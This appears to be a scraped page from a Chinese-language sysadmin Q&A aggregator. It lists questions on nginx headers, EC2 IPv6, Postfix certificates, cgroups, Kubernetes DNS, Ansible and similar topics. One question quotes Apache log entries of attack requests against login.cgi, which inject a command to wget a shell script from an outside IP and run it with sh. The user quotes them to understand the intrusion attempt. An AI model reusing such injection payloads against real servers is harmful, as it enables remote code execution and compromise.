问题列表 - 第4919页

如何从代理位置删除服务器添加的标头?

我有一个 Nginx 代理设置,我向服务器添加了几个与安全相关的标头,以便它们返回所有代理位置。在某些位置我需要添加额外的标头(例如Content-Security-Policyto /),而在其他特定位置我需要删除在服务器级别添加的标头之一(例如X-Frame-Optionsfrom /framepage.html)。

nginx.conf

# ...

server {
  # ...

  include security-headers.conf;

  location / {
    proxy_pass http://web:5000/;
    include security-headers.conf;
    add_header Content-Security-Policy "my csp...";
  }

  location = /framepage.html {
    proxy_pass http://web:5000/framepage.html;
    # TODO: remove `X-Frame-Options` response header from this specific page
    # Tried add_header X-Frame-Options "";
    # Tried proxy_set_header X-Frame-Options "";
    # Tried proxy_hide_header X-Frame-Options;
  }

  location /api/ {
    proxy_pass http://api:5000/;
  }

  location /otherstuff/ {
    proxy_pass http://otherstuff:5000/;
  }

  # ...
}
Run Code Online (Sandbox Code Playgroud)

security-headers.conf

add_header …
Run Code Online (Sandbox Code Playgroud)

nginx

20
推荐指数
3
解决办法
4万
查看次数

如何在 Amazon EC2 上的 Fedora 28 上启用 IPv6

我似乎无法在 Amazon EC2 的 Fedora 28 中使用 IPv6(因此使用 cloud-init 和 DHCPv6)。

它使用此处描述的配置在 RHEL 7 中工作。将相同的配置应用于 Fedora 28 似乎没有任何作用。特别是,/etc/sysconfig/network得到改写包含NETWORKING_IPV6=yes,也不/etc/sysconfig/network-scripts/ifcfg-eth0包含任何IPv6的东西。

我的/etc/cloud/cloud.cfg.d/56-custom-networking.cfg包含:

network:
  version: 1
  config:
  - type: physical
    name: eth0
    subnets:
      - type: dhcp
      - type: dhcp6
Run Code Online (Sandbox Code Playgroud)

生成的/etc/sysconfig/network是:

NOZEROCONF=yes
DEVTIMEOUT=10

# Created by cloud-init on instance boot automatically, do not edit.
#
NETWORKING=yes
Run Code Online (Sandbox Code Playgroud)

生成的/etc/sysconfig/network-scripts/ifcfg-eth0是:

# Created by cloud-init on instance boot automatically, do not edit.
# …
Run Code Online (Sandbox Code Playgroud)

fedora ipv6 amazon-ec2 cloud-init dhcpv6

5
推荐指数
1
解决办法
872
查看次数

一个 IP 上的 Postfix、多域和多证书

我有一个 postfix 服务器,它有多个域,我想每个都有一个特定的证书。我的服务器只有一个IP。

我找到了一个多 IP 的解决方案,但没有我不知道如何做到这一点。

  • 服务器:Debian 9
  • 后缀:3.1.8

ssl postfix ssl-certificate

8
推荐指数
3
解决办法
8665
查看次数

如果您使用 EIP 创建 EC2 实例,您是否需要 IGW 来访问互联网

我\xe2\x80\x99m对AWS中的互联网网关感到困惑,如果它说为了让你的VPC访问互联网,你需要一个IGW,那么为什么当你使用EIP创建EC2实例时,你会自动访问互联网。

\n\n

然后我有一个我无法回答的问题:

\n\n

那么为什么当您在 AWS 中创建 EC2 实例(在默认 VPC 中创建)并分配弹性 IP 时,如果 AWS 文档中说为了让您的 VPC 能够访问互联网,您会自动访问互联网您需要互联网网关吗?

\n

amazon-web-services amazon-vpc

6
推荐指数
1
解决办法
8263
查看次数

有人只是想黑我?登录.cgi+wget

我正在构建一个新服务器Apache,实际上我正在学习,所以我正在尝试不同的东西。我的安全系统已经完成,但当然我可能会遗漏一些东西,或者,如果没有,我明白今天没有任何系统可以 100% 保护我。那么,为什么我认为有人尝试过我,只是因为我在日志中收到了以下信息:

1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"

41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566

还有更多。我知道有人收到错误 400,这对我来说还不错。所以,实际上我的问题不是他们是否尝试我,因为我认为是,因为这似乎不是对我网站的正常请求。我想得到这个请求的解释来理解和学习。他们实际上想做什么,找到我的登录系统并将其发送给某个人?

PS我已经知道wget你可以下载一些网站,我还发现这login.cgi是一个基于cookie的身份验证程序。

谢谢!

security monitoring login hacking apache-2.4

1
推荐指数
1
解决办法
5426
查看次数

cgroup v2 为空的控制器列表

我正在尝试了解 cgroups v2 是如何工作的。我这样做了:

mount -t cgroup2 none /mnt/cgroup2
Run Code Online (Sandbox Code Playgroud)

这给了我一个对象列表 /mnt/cgroup2

root@ubuntu-s-1vcpu-1gb-lon1-01:~# ls -la /mnt/cgroup2/
total 4
dr-xr-xr-x  5 root root    0 Sep  2 16:04 .
drwxr-xr-x  3 root root 4096 Sep  2 16:05 ..
-r--r--r--  1 root root    0 Sep  2 16:04 cgroup.controllers
-rw-r--r--  1 root root    0 Sep  2 16:04 cgroup.max.depth
-rw-r--r--  1 root root    0 Sep  2 16:04 cgroup.max.descendants
-rw-r--r--  1 root root    0 Sep  2 16:04 cgroup.procs
-r--r--r--  1 root root    0 Sep  2 16:04 cgroup.stat …
Run Code Online (Sandbox Code Playgroud)

linux cgroup

5
推荐指数
1
解决办法
2180
查看次数

如何在 Windows 上启用数据包转发?

在Linux系统中,我们可以使用bellow命令开启报文转发:

~ # sysctl net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
Run Code Online (Sandbox Code Playgroud)

但是如何在 Windows 中实现相同的功能呢?

我用Windows Server 2008 R2.

windows

3
推荐指数
2
解决办法
2万
查看次数

Azure 高可用性解决方案,可同步网站和 SQL 服务器数据

我们有一个我们出售的 Web 解决方案,它带有 1 个专用的 Azure VM,其中包含运行应用程序所需的一切:

  • ASP.NET 网络应用程序
  • 生产环境
  • 质量保证环境
  • 包含 PROD 和 QA 环境数据的 SQL 服务器

但是,特定客户要求在高可用性设置中运行其应用程序。他想要的是,当一台服务器出现故障时,另一台应该接管,反之亦然。

我对负载平衡/高可用性设置完全陌生,我知道 Azure 支持负载平衡,但我对如何使其工作感到困惑。使用上述设置创建 2 个服务器然后设置高可用性功能是否容易?我关心的是如何在两台服务器之间同步网站数据和 SQL Server 数据?尤其是后者。

或者如果我使用 Azure SQL 服务器而不是本地 SQL 服务器会更容易吗?或者可能引入额外的服务器而不是 2 个?

asp.net high-availability load-balancing sql-server azure

4
推荐指数
1
解决办法
292
查看次数

Kubernetes Pod DNS 解析

目前能够将所有服务解析为 IP 地址并进行 telnet 和 ping 操作。无法将 Pod 解析为 IP 地址。虽然可以使用 kubectl 和 telnet 查找 pod IP 地址并对它们执行 ping 操作。我需要如何配置 DNS 来解析 Kubernetes 1.9.6、dns-controller:1.9.1 中的 pod。

internal-dns kubernetes

4
推荐指数
1
解决办法
2万
查看次数

Ansible PreferredAuthentications SSH 设置从何而来?

我正在使用 SSH 用户名和密码设置运行标准的 ansible (v2.3.1) 剧本。使用“-vvvv”设置时,我可以看到生成了这些 SSH 命令

EXEC ssh -C -o ControlMaster=auto -o ControlPersist=60s 
-o StrictHostKeyChecking=no -o Port=2222 
-o KbdInteractiveAuthentication=no 
-o PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey 
-o PasswordAuthentication=no -o User=dc_user -o ConnectTimeout=10
Run Code Online (Sandbox Code Playgroud)

在上述情况下,从何处提取“PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey”设置。我相信这些来自客户端 SSH 配置设置,但这是正确的吗?

我知道我可以通过在我的“ansaible.cfg”中定义它来覆盖 ssh 参数

[ssh_connection]
scp_if_ssh=True
ssh_args = -o ControlMaster=auto -o ControlPersist=60s -o PreferredAuthentications=publickey
Run Code Online (Sandbox Code Playgroud)

谁可以给我解释一下这个?谢谢

ssh ansible ansible-playbook

3
推荐指数
1
解决办法
4087
查看次数